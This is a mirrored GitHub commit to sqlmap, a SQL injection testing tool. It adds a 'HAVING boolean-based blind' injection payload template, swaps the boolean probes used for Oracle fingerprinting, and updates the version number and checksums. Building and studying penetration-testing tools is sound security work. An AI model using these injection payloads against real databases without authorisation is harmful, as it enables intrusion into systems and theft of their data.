Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 25369ca

Browse files
stamparmstamparm
committed
Adding new payload (HAVING boolean-based blind)
1 parent a399b65 commit 25369ca

4 files changed

Lines changed: 26 additions & 9 deletions

File tree

lib/core/settings.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@
1919
from lib.core.enums import OS
2020

2121
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
22-
VERSION = "1.2.6.4"
22+
VERSION = "1.2.6.5"
2323
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
2424
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
2525
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

plugins/dbms/oracle/fingerprint.py

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -68,23 +68,23 @@ def checkDbms(self):
6868
infoMsg = "testing %s" % DBMS.ORACLE
6969
logger.info(infoMsg)
7070

71-
# NOTE: SELECT ROWNUM=ROWNUM FROM DUAL does not work connecting
72-
# directly to the Oracle database
71+
# NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does
72+
# not work connecting directly to the Oracle database
7373
if conf.direct:
7474
result = True
7575
else:
76-
result = inject.checkBooleanExpression("ROWNUM=ROWNUM")
76+
result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)")
7777

7878
if result:
7979
infoMsg = "confirming %s" % DBMS.ORACLE
8080
logger.info(infoMsg)
8181

82-
# NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does
82+
# NOTE: SELECT NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1]) FROM DUAL does
8383
# not work connecting directly to the Oracle database
8484
if conf.direct:
8585
result = True
8686
else:
87-
result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)")
87+
result = inject.checkBooleanExpression("NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])")
8888

8989
if not result:
9090
warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE

txt/checksum.md5

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
4747
0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
4848
a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
4949
fcb74fcc9577523524659ec49e2e964b lib/core/session.py
50-
9d0f7b5da86733268cf0ee3bcce3fd0e lib/core/settings.py
50+
ea76ddec1c3e65b63c217aaaf6e15e3c lib/core/settings.py
5151
0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
5252
a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
5353
6306284edcccc185b2df085438572b0d lib/core/target.py
@@ -177,7 +177,7 @@ fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py
177177
f772070dba85976a7894dac5046b93ea plugins/dbms/oracle/connector.py
178178
e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py
179179
c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py
180-
e16cbf8abda91a906ca7bafb81d8866e plugins/dbms/oracle/fingerprint.py
180+
538395c0e5ccb1b6befc17f129f45f29 plugins/dbms/oracle/fingerprint.py
181181
9cbce3d3747c67f18e65f9c1eb910b0e plugins/dbms/oracle/__init__.py
182182
5c2f1611c3ceface38a7e95650391ae6 plugins/dbms/oracle/syntax.py
183183
bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py
@@ -467,7 +467,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml
467467
fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml
468468
0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml
469469
a279656ea3fcb85c727249b02f828383 xml/livetests.xml
470-
14a2abeb88b00ab489359d0dd7a3017f xml/payloads/boolean_blind.xml
470+
3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml
471471
b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml
472472
06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
473473
3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml

xml/payloads/boolean_blind.xml

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1361,6 +1361,23 @@ Tag: <test>
13611361
<dbms>SAP MaxDB</dbms>
13621362
</details>
13631363
</test>
1364+
1365+
<!-- Works in MySQL, Oracle, etc. -->
1366+
<test>
1367+
<title>HAVING boolean-based blind - WHERE, GROUP BY clause</title>
1368+
<stype>1</stype>
1369+
<level>3</level>
1370+
<risk>1</risk>
1371+
<clause>1,2</clause>
1372+
<where>1</where>
1373+
<vector>HAVING [INFERENCE]</vector>
1374+
<request>
1375+
<payload>HAVING [RANDNUM]=[RANDNUM]</payload>
1376+
</request>
1377+
<response>
1378+
<comparison>HAVING [RANDNUM]=[RANDNUM1]</comparison>
1379+
</response>
1380+
</test>
13641381
<!-- End of boolean-based blind tests - ORDER BY, GROUP BY clause -->
13651382

13661383
<!-- Boolean-based blind tests - Stacked queries -->

0 commit comments

Comments
 (0)